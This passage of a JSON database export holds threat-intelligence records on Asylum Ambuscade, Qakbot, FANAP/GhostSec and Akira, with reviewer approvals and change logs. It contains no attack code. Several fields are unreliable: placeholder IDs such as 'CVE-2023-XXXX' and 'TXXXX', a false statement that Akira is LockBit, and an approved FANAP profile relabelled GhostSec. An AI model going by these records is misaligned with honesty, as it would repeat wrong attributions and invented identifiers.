    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "",
  "attack_consequences": "The consequences of Asylum Ambuscade's activities range from financial loss to the exfiltration of sensitive data., Financial Loss,  Exfiltration of Sensitive Data, financial loss, exfiltration of sensitive data",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Asylum Ambuscade\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"The consequences of Asylum Ambuscade's activities range from financial loss to the exfiltration of sensitive data., Financial Loss,  Exfiltration of Sensitive Data, financial loss, exfiltration of sensitive data\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Asylum Ambuscade is a cybercrime group that is also involved in cyberespionage. They have been operating since at least 2020 and have targeted various industries and government entities in Europe and Central Asia. Their primary motives appear to be financial gain and cyberespionage., Asylum Ambuscade is a cybercrime group believed to have originated in 2020. They primarily target the financial sector,  including crypto-traders,  government agencies,  and organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group that engages in cyberespionage activities on the side. They primarily target the financial sectors,  including cryptocurrency traders and bank accounts,  as well as government agencies. They have been involved in campaigns targeting organizations assisting refugees during the Russian-Ukraine war., Asylum Ambuscade is believed to have commenced its activities in 2020,  and it was officially identified in 2022. Despite the obscurity surrounding the group's origins,  their primary targets have become discernible. Distinctly focusing on the financial sectors,  and government agencies. Notably,  they have orchestrated a significant campaign directed towards organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group that engages in cyberespionage. They primarily target the financial sectors,  and government agencies. They have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war., Asylum Ambuscade is a threat group that targets the financial sectors and government agencies,  with a particular focus on crypto-traders and organizations assisting refugees during the Russian-Ukraine war.\", \"target_countries\": [\"UA\", \"EU\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Espionage\", \"Disruption of Service\"], \"target_industry_sectors\": [\"financial-services\", \"government\"], \"threat_actor_capabilities\": [\"T1003\", \"T1024\", \"T1055\", \"T1053\", \"T1105\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"allinfosec\", \"SC Magazine\", \"Dark Reading\", \"Welivesecurity\", \"ProofPoint\", \"BleepingComputer\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Asylum Ambuscade\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"UA\", \"EU\"], \"target_regions\": [\"Europe\", \"Central Asia\", \"Eastern Europe\"], \"threat_actor_overview\": [\"Asylum Ambuscade is a cybercrime group that is also involved in cyberespionage. They have been operating since at least 2020 and have targeted various industries and government entities in Europe and Central Asia. Their primary motives appear to be financial gain and cyberespionage.\", \"Asylum Ambuscade is a cybercrime group believed to have originated in 2020. They primarily target the financial sector\", \" including crypto-traders\", \" government agencies\", \" and organizations providing assistance to refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is a cybercrime group that engages in cyberespionage activities on the side. They primarily target the financial sectors\", \" including cryptocurrency traders and bank accounts\", \" as well as government agencies. They have been involved in campaigns targeting organizations assisting refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is believed to have commenced its activities in 2020\", \" and it was officially identified in 2022. Despite the obscurity surrounding the group's origins\", \" their primary targets have become discernible. Distinctly focusing on the financial sectors\", \" and government agencies. Notably\", \" they have orchestrated a significant campaign directed towards organizations providing assistance to refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is a cybercrime group that engages in cyberespionage. They primarily target the financial sectors\", \" and government agencies. They have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is a threat group that targets the financial sectors and government agencies\", \" with a particular focus on crypto-traders and organizations assisting refugees during the Russian-Ukraine war.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\", \"government\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Espionage\", \"Disruption of Service\", \" Financial Theft\", \"Financial Gain\", \"Cyberespionage\"], \"threat_actor_capabilities\": [\"T1003\", \"T1024\", \"T1055\", \"T1053\", \"T1105\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\", \"Organization\"], \"threat_actor_sophistication\": [\"intermediate\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"attack_mitigations\": [], \"attack_consequences\": [\"The consequences of Asylum Ambuscade's activities range from financial loss to the exfiltration of sensitive data.\", \"Financial Loss\", \" Exfiltration of Sensitive Data\", \"financial loss\", \"exfiltration of sensitive data\"], \"vulnerabilities\": [], \"sources\": [\"allinfosec\", \"SC Magazine\", \"Dark Reading\", \"Welivesecurity\", \"ProofPoint\", \"BleepingComputer\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-05T15:17:55.348Z"
  },
  "approval_message": "Missing information, and some outdated sources. ",
  "change_log": [
    {
      "_id": {
        "$oid": "64f74623ed13c104bf6d21c0"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T15:15:47.283Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1003",
            "T1024",
            "T1055",
            "T1053",
            "T1105"
          ],
          "updated_value": []
        }
      ]
    }
  ],
  "threat_actor": "Asylum Ambuscade"
},
{
  "_id": {
    "$oid": "64f74ad4477acf4501273e57"
  },
  "report": {
    "$oid": "64f74a34ed13c104bf6d21c1"
  },
  "threat_actor_overview": "Asylum Ambuscade is a cybercrime group that has been active since at least 2020. They primarily target the financial sector,  including crypto-traders,  and government agencies. They have also conducted campaigns against organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a threat group that emerged in 2020 and was officially identified in 2022. They primarily focus on targeting the financial sector,  and government agencies. They have also conducted significant campaigns aimed at organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group believed to have started its activities in 2020. They primarily target the financial sector,  and government agencies. They have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group believed to have commenced its activities in 2020. Primarily targeting financial sectors such as cryptocurrency traders and government agencies,  they have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war.",
  "aliases": [],
  "sources": [
    "HivePro",
    "allinfosec",
    "SC Magazine",
    "Dark Reading",
    "Welivesecurity",
    "ProofPoint",
    "BleepingComputer"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1566",
    "T1204",
    "T1189",
    "T1190",
    "T1555.003",
    "T1059.001",
    "T1059",
    "T1059.005",
    "T1059.007",
    "T1547",
    "T1587.001",
    "T1204.002",
    "T1566.001"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "",
  "attack_consequences": "The consequences of Asylum Ambuscade's attacks can range from insignificant to catastrophic,  including financial loss and exfiltration of sensitive data., financial loss, exfiltration of sensitive data",
  "vulnerabilities": [
    "CVE-2022-30190"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Asylum Ambuscade\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"The consequences of Asylum Ambuscade's attacks can range from insignificant to catastrophic,  including financial loss and exfiltration of sensitive data., financial loss, exfiltration of sensitive data\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Asylum Ambuscade is a cybercrime group that has been active since at least 2020. They primarily target the financial sector,  including crypto-traders,  and government agencies. They have also conducted campaigns against organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a threat group that emerged in 2020 and was officially identified in 2022. They primarily focus on targeting the financial sector,  and government agencies. They have also conducted significant campaigns aimed at organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group believed to have started its activities in 2020. They primarily target the financial sector,  and government agencies. They have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group believed to have commenced its activities in 2020. Primarily targeting financial sectors such as cryptocurrency traders and government agencies,  they have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"financial-services\", \"government\"], \"threat_actor_capabilities\": [\"T1566\", \"T1204\", \"T1189\", \"T1190\", \"T1555.003\", \"T1059.001\", \"T1059\", \"T1059.005\", \"T1059.007\", \"T1547\", \"T1587.001\", \"T1204.002\", \"T1204.001\", \"T1566.001\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"aliases\": [], \"vulnerabilities\": [\"CVE-2022-30190\"], \"sources\": [\"allinfosec\", \"SC Magazine\", \"Dark Reading\", \"Welivesecurity\", \"ProofPoint\", \"BleepingComputer\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Asylum Ambuscade\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [\"Europe\", \"Central Asia\"], \"threat_actor_overview\": [\"Asylum Ambuscade is a cybercrime group that has been active since at least 2020. They primarily target the financial sector\", \" including crypto-traders\", \" and government agencies. They have also conducted campaigns against organizations providing assistance to refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is a threat group that emerged in 2020 and was officially identified in 2022. They primarily focus on targeting the financial sector\", \" and government agencies. They have also conducted significant campaigns aimed at organizations providing assistance to refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is a cybercrime group believed to have started its activities in 2020. They primarily target the financial sector\", \" and government agencies. They have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war.\", \"Asylum Ambuscade is a cybercrime group believed to have commenced its activities in 2020. Primarily targeting financial sectors such as cryptocurrency traders and government agencies\", \" they have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\", \"government\"], \"threat_actor_intent\": [\"Financial Gain\", \" Espionage\", \"Information Theft\", \" Financial Theft\", \"Financial Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1566\", \"T1204\", \"T1189\", \"T1190\", \"T1555.003\", \"T1059.001\", \"T1059\", \"T1059.005\", \"T1059.007\", \"T1547\", \"T1587.001\", \"T1204.002\", \"T1204.001\", \"T1566.001\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\", \"unknown\", \"Unknown\"], \"threat_actor_sophistication\": [\"intermediate\", \"Intermediate\"], \"threat_actor_type\": [\"criminal\", \"unknown\", \"Criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [\"The consequences of Asylum Ambuscade's attacks can range from insignificant to catastrophic\", \" including financial loss and exfiltration of sensitive data.\", \"financial loss\", \"exfiltration of sensitive data\"], \"vulnerabilities\": [\"CVE-2022-30190\"], \"sources\": [\"allinfosec\", \"SC Magazine\", \"Dark Reading\", \"Welivesecurity\", \"ProofPoint\", \"BleepingComputer\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-07T19:28:10.225Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f74c63ed13c104bf6d21c3"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T15:42:27.180Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [
            "allinfosec",
            "SC Magazine",
            "Dark Reading",
            "Welivesecurity",
            "ProofPoint",
            "BleepingComputer"
          ],
          "updated_value": [
            "HivePro",
            "allinfosec",
            "SC Magazine",
            "Dark Reading",
            "Welivesecurity",
            "ProofPoint",
            "BleepingComputer"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f74c38ed13c104bf6d21c2"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T15:41:44.412Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1566",
            "T1204",
            "T1189",
            "T1190",
            "T1555.003",
            "T1059.001",
            "T1059",
            "T1059.005",
            "T1059.007",
            "T1547",
            "T1587.001",
            "T1204.002",
            "T1204.001",
            "T1566.001"
          ],
          "updated_value": [
            "T1566",
            "T1204",
            "T1189",
            "T1190",
            "T1555.003",
            "T1059.001",
            "T1059",
            "T1059.005",
            "T1059.007",
            "T1547",
            "T1587.001",
            "T1204.002",
            "T1566.001"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Asylum Ambuscade"
},
{
  "_id": {
    "$oid": "64f791ce8956ef08084b4e90"
  },
  "report": {
    "$oid": "64f7919008eda25299b36a29"
  },
  "threat_actor_overview": "Qakbot is a highly structured and multi-layered bot network used by cybercriminals to target critical industries worldwide., Qakbot is a highly structured and multi-layered botnet used by cybercriminal organizations. It primarily infects victim computers through spam email messages containing malicious attachments or hyperlinks. Qakbot has been used by various ransomware groups to extort victims.",
  "aliases": [
    "Qbot",
    "Pinkslipbot"
  ],
  "sources": [
    "https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources"
  ],
  "country_of_origin": "Unknown",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service",
    "Damage and Destruction",
    "Espionage",
    "Disinformation",
    "Credential Harvesting",
    "Creating Botnets",
    "Cyber Stalking",
    "Resource Hijacking"
  ],
  "threat_actor_capabilities": [
    "T1566.001",
    "T1589.001",
    "T1589.002",
    "T1489.001"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "Unknown"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Qakbot\", \"country_of_origin\": \"Unknown\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Qakbot is a highly structured and multi-layered bot network used by cybercriminals to target critical industries worldwide., Qakbot is a highly structured and multi-layered botnet used by cybercriminal organizations. It primarily infects victim computers through spam email messages containing malicious attachments or hyperlinks. Qakbot has been used by various ransomware groups to extort victims.\", \"target_countries\": [\"Unknown\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\", \"Espionage\", \"Disinformation\", \"Credential Harvesting\", \"Creating Botnets\", \"Cyber Stalking\", \"Resource Hijacking\"], \"target_industry_sectors\": [\"financial-services\", \"government\", \"healthcare\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1589.001\", \"T1589.002\", \"T1489.001\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [\"Qbot\", \"Pinkslipbot\"], \"vulnerabilities\": [], \"sources\": [\"https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Qakbot\"], \"aliases\": [\"Qbot\", \"Pinkslipbot\"], \"country_of_origin\": [\"Unknown\"], \"target_countries\": [\"Unknown\"], \"target_regions\": [\"Americas\", \"Europe\", \"Asia\", \"Africa\", \"Oceania\", \"Middle East\", \"Unknown\"], \"threat_actor_overview\": [\"Qakbot is a highly structured and multi-layered bot network used by cybercriminals to target critical industries worldwide.\", \"Qakbot is a highly structured and multi-layered botnet used by cybercriminal organizations. It primarily infects victim computers through spam email messages containing malicious attachments or hyperlinks. Qakbot has been used by various ransomware groups to extort victims.\"], \"target_populations\": [], \"target_industry_sectors\": [\"Agriculture\", \"Aerospace\", \"Automotive\", \"Chemical\", \"Commercial\", \"Communications\", \"Construction\", \"Defense\", \"Education\", \"Energy\", \"Entertainment\", \"Financial-Services\", \"Emergency-Services\", \"Government\", \"Government-Local\", \"Government-National\", \"Government-Public-Services\", \"Government-Regional\", \"Healthcare\", \"Hospitality-Leisure\", \"Infrastructure\", \"Infrastructure-Dams\", \"Infrastructure-Nuclear\", \"Infrastructure-Water\", \"Insurance\", \"Manufacturing\", \"Mining\", \"Non-Profit\", \"Pharmaceuticals\", \"Retail\", \"Technology\", \"Telecommunications\", \"Transportation\", \"Utilities\", \"financial-services\", \"government\", \"healthcare\", \"Various industries\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\", \"Espionage\", \"Disinformation\", \"Credential Harvesting\", \"Creating Botnets\", \"Cyber Stalking\", \"Resource Hijacking\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1589.001\", \"T1589.002\", \"T1489.001\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\", \"Organization\"], \"threat_actor_sophistication\": [\"advanced\", \"Advanced\"], \"threat_actor_type\": [\"criminal\", \"Criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "approval_status_changed_on": {
    "$date": "2023-09-06T18:51:06.419Z"
  },
  "approval_message": "Missing too much information. ",
  "change_log": [],
  "threat_actor": "Qakbot"
},
{
  "_id": {
    "$oid": "64f79a539b36b1a0dfaf4f4e"
  },
  "report": {
    "$oid": "64f79a171725baed7a65c1d5"
  },
  "threat_actor_overview": "FANAP is an Iranian provider of technology to financial services and the IT sector. However,  it has also developed a surveillance system used by the Iranian government to monitor its citizens,  with similarities to the Pegasus spyware and tools from Cellebrite., FANAP is an Iranian provider of technology to the financial services and IT sector. They have allegedly expanded their offerings to include a comprehensive surveillance system used by the Iranian government to monitor its citizens.",
  "aliases": [],
  "sources": [
    "DarkReading"
  ],
  "country_of_origin": "Iran, IR",
  "threat_actor_motives": [
    "Espionage"
  ],
  "threat_actor_intent": [
    "Espionage",
    "Information Theft"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "activist",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"FANAP, FANAP group, \", \"country_of_origin\": \"Iran, IR\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"FANAP is an Iranian provider of technology to financial services and the IT sector. However,  it has also developed a surveillance system used by the Iranian government to monitor its citizens,  with similarities to the Pegasus spyware and tools from Cellebrite., FANAP is an Iranian provider of technology to the financial services and IT sector. They have allegedly expanded their offerings to include a comprehensive surveillance system used by the Iranian government to monitor its citizens.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1040\", \"T1113\", \"T1210\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"unknown\"], \"aliases\": [], \"vulnerabilities\": [\"CVE\"], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"FANAP\", \"FANAP group\", \"\"], \"aliases\": [], \"country_of_origin\": [\"Iran\", \"IR\"], \"target_countries\": [], \"target_regions\": [\"Middle East\"], \"threat_actor_overview\": [\"FANAP is an Iranian provider of technology to financial services and the IT sector. However\", \" it has also developed a surveillance system used by the Iranian government to monitor its citizens\", \" with similarities to the Pegasus spyware and tools from Cellebrite.\", \"FANAP is an Iranian provider of technology to the financial services and IT sector. They have allegedly expanded their offerings to include a comprehensive surveillance system used by the Iranian government to monitor its citizens.\"], \"target_populations\": [], \"target_industry_sectors\": [\"Financial Services\", \"Technology\"], \"threat_actor_intent\": [\"Information Theft\"], \"threat_actor_capabilities\": [\"T1040\", \"T1113\", \"T1210\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\", \"Organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"unknown\", \"Nation-State\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [\"CVE\"], \"sources\": []}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
  "approval_status_changed_on": {
    "$date": "2023-09-06T21:22:54.790Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f8ec32b7c07283369b9d1f"
      },
      "updated_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
      "updated_on": {
        "$date": "2023-09-06T21:16:34.832Z"
      },
      "changes": [
        {
          "field": "target_industry_sectors",
          "previous_value": [],
          "updated_value": [
            {
              "id": "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
              "name": "financial-services",
              "description": null,
              "created": "2023-08-24 13:57:04.385000",
              "spec_version": "2.1",
              "expired": false,
              "modified": null,
              "x_included_in_stix_ov": true,
              "_cls": "XStixIndustrySector"
            }
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f79b9a1725baed7a65c1d9"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T21:20:26.433Z"
      },
      "changes": [
        {
          "field": "sources",
          "previous_value": [],
          "updated_value": [
            "DarkReading"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f79b8a1725baed7a65c1d8"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T21:20:10.851Z"
      },
      "changes": [
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1040",
            "T1113",
            "T1210"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f79b561725baed7a65c1d7"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T21:19:18.438Z"
      },
      "changes": [
        {
          "field": "threat_actor_intent",
          "previous_value": [
            "Information Theft"
          ],
          "updated_value": [
            "Espionage",
            "Information Theft"
          ]
        },
        {
          "field": "threat_actor_type",
          "previous_value": [
            "unknown"
          ],
          "updated_value": [
            "activist",
            "unknown"
          ]
        },
        {
          "field": "threat_actor_motives",
          "previous_value": [
            "Financial Gain",
            "Espionage"
          ],
          "updated_value": [
            "Espionage"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f79b261725baed7a65c1d6"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-05T21:18:30.133Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "FANAP, FANAP group, ",
          "updated_value": "GhostSec"
        }
      ]
    }
  ],
  "threat_actor": "GhostSec"
},
{
  "_id": {
    "$oid": "64f8f782fc45b3343c02cb9a"
  },
  "report": {
    "$oid": "64f8eaba962ce7e9153e4aea"
  },
  "threat_actor_overview": "The Akira ransomware gang,  also known as LockBit,  has been targeting Cisco Adaptive Security Appliance (ASA) SSL VPNs in credential stuffing and brute-force attacks since March 2023. They have primarily breached organizations' networks by exploiting lapses in security defenses,  such as the lack of multi-factor authentication (MFA) enforcement. Akira/LockBit has demonstrated the ability to guess login credentials through brute force attacks,  but there is no evidence of them bypassing properly configured MFA. They have compromised SSL VPNs to gain initial network access,  followed by remote desktop software and dumping of Active Directory database to further compromise the victims' systems. They have been linked to ransomware deployments and have shown capabilities in information theft and financial theft. The group has targeted various industry sectors and regions,  with a sophistication level considered advanced. They operate as a hacker group,  utilizing individual and organizational resources. The vulnerabilities they exploit are not explicitly mentioned. The target countries and population,  as well as their country of origin,  are not specified.",
  "aliases": [
    "LockBit",
    ""
  ],
  "sources": [
    ""
  ],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [
    "TXXXX",
    "TYYYY"
  ],
  "threat_actor_resources": [
    "individual",
    "organization"
  ],
  "threat_actor_type": [
    "hacker"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "XX",
    "YY"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-2023-XXXX",
    "CVE-2023-YYYY"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Akira ransomware gang\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Akira ransomware gang,  also known as LockBit,  has been targeting Cisco Adaptive Security Appliance (ASA) SSL VPNs in credential stuffing and brute-force attacks since March 2023. They have primarily breached organizations' networks by exploiting lapses in security defenses,  such as the lack of multi-factor authentication (MFA) enforcement. Akira/LockBit has demonstrated the ability to guess login credentials through brute force attacks,  but there is no evidence of them bypassing properly configured MFA. They have compromised SSL VPNs to gain initial network access,  followed by remote desktop software and dumping of Active Directory database to further compromise the victims' systems. They have been linked to ransomware deployments and have shown capabilities in information theft and financial theft. The group has targeted various industry sectors and regions,  with a sophistication level considered advanced. They operate as a hacker group,  utilizing individual and organizational resources. The vulnerabilities they exploit are not explicitly mentioned. The target countries and population,  as well as their country of origin,  are not specified.\", \"target_countries\": [\"XX\", \"YY\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"TXXXX\", \"TYYYY\"], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"individual\", \"organization\"], \"threat_actor_type\": [\"hacker\"], \"aliases\": [\"LockBit\", \"\"], \"vulnerabilities\": [\"CVE-2023-XXXX\", \"CVE-2023-YYYY\"], \"sources\": [\"\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Akira ransomware gang\", \"\"], \"aliases\": [\"LockBit\", \"\"], \"country_of_origin\": [], \"target_countries\": [\"XX\", \"YY\"], \"target_regions\": [\"region1\", \"region2\"], \"threat_actor_overview\": [\"The Akira ransomware gang\", \" also known as LockBit\", \" has been targeting Cisco Adaptive Security Appliance (ASA) SSL VPNs in credential stuffing and brute-force attacks since March 2023. They have primarily breached organizations' networks by exploiting lapses in security defenses\", \" such as the lack of multi-factor authentication (MFA) enforcement. Akira/LockBit has demonstrated the ability to guess login credentials through brute force attacks\", \" but there is no evidence of them bypassing properly configured MFA. They have compromised SSL VPNs to gain initial network access\", \" followed by remote desktop software and dumping of Active Directory database to further compromise the victims' systems. They have been linked to ransomware deployments and have shown capabilities in information theft and financial theft. The group has targeted various industry sectors and regions\", \" with a sophistication level considered advanced. They operate as a hacker group\", \" utilizing individual and organizational resources. The vulnerabilities they exploit are not explicitly mentioned. The target countries and population\", \" as well as their country of origin\", \" are not specified.\", \"\"], \"target_populations\": [], \"target_industry_sectors\": [\"sector1\", \"sector2\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [\"TXXXX\", \"TYYYY\"], \"threat_actor_motives\": [\"SXXXX\", \"SYYYY\"], \"threat_actor_resources\": [\"individual\", \"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"hacker\"], \"attack_mitigations\": [\"\"], \"attack_consequences\": [\"\"], \"vulnerabilities\": [{\"CVE_ID\": null}, \"CVE-2023-XXXX\", \"CVE-2023-YYYY\"], \"sources\": [\"\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "approval_status_changed_on": {
    "$date": "2023-09-07T15:40:19.473Z"
  },
  "approval_message": "Missing or incorrect data is most sections",
  "change_log": [],
  "threat_actor": "Akira ransomware gang"
},
{
  "_id": {
    "$oid": "64fa10fdfe98e3919ed5aeb8"
  },
  "report": {
    "$oid": "64fa0e8820fb3e090f7fb1d0"
  },
